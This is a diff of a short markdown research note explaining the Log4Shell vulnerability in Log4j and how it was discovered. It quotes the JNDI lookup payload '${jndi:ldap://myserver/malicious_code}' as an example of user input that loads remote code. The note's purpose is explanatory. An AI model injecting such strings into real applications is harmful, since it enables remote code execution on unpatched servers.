Kibuns/Research/Security.md

 ```java
 logger.info("{} has logged in using id {}", "${jndi:ldap://logconfig/example/name}", user.getId());
 ```
-This is the vulnerability.
+The code above is the vulnerability.
 Let's say a vulnerable application logs a users input.
 A user could then input a string like ```${jndi:ldap://myserver/malicious_code}```.
 Log4J will see this and try to look up this JNDI.
 Which would then introduce a malicious java object into the JVM.

 ## How did Log4Shell get discovered?
+According to [this source](https://www.npr.org/2021/12/14/1064123144/companies-scramble-to-defend-against-newly-discovered-log4j-digital-flaw?t=1640603508585) A researcher working for Chinese tech firm Alibaba discovered the bug and privately informed the Apache Software Foundation.
+It accidentally went public after the popular word building video game Minecraft made its disclosure and the researcher posted about it online.

 ## What are the potential fixes for severe vulnerabilities like Log4Shell?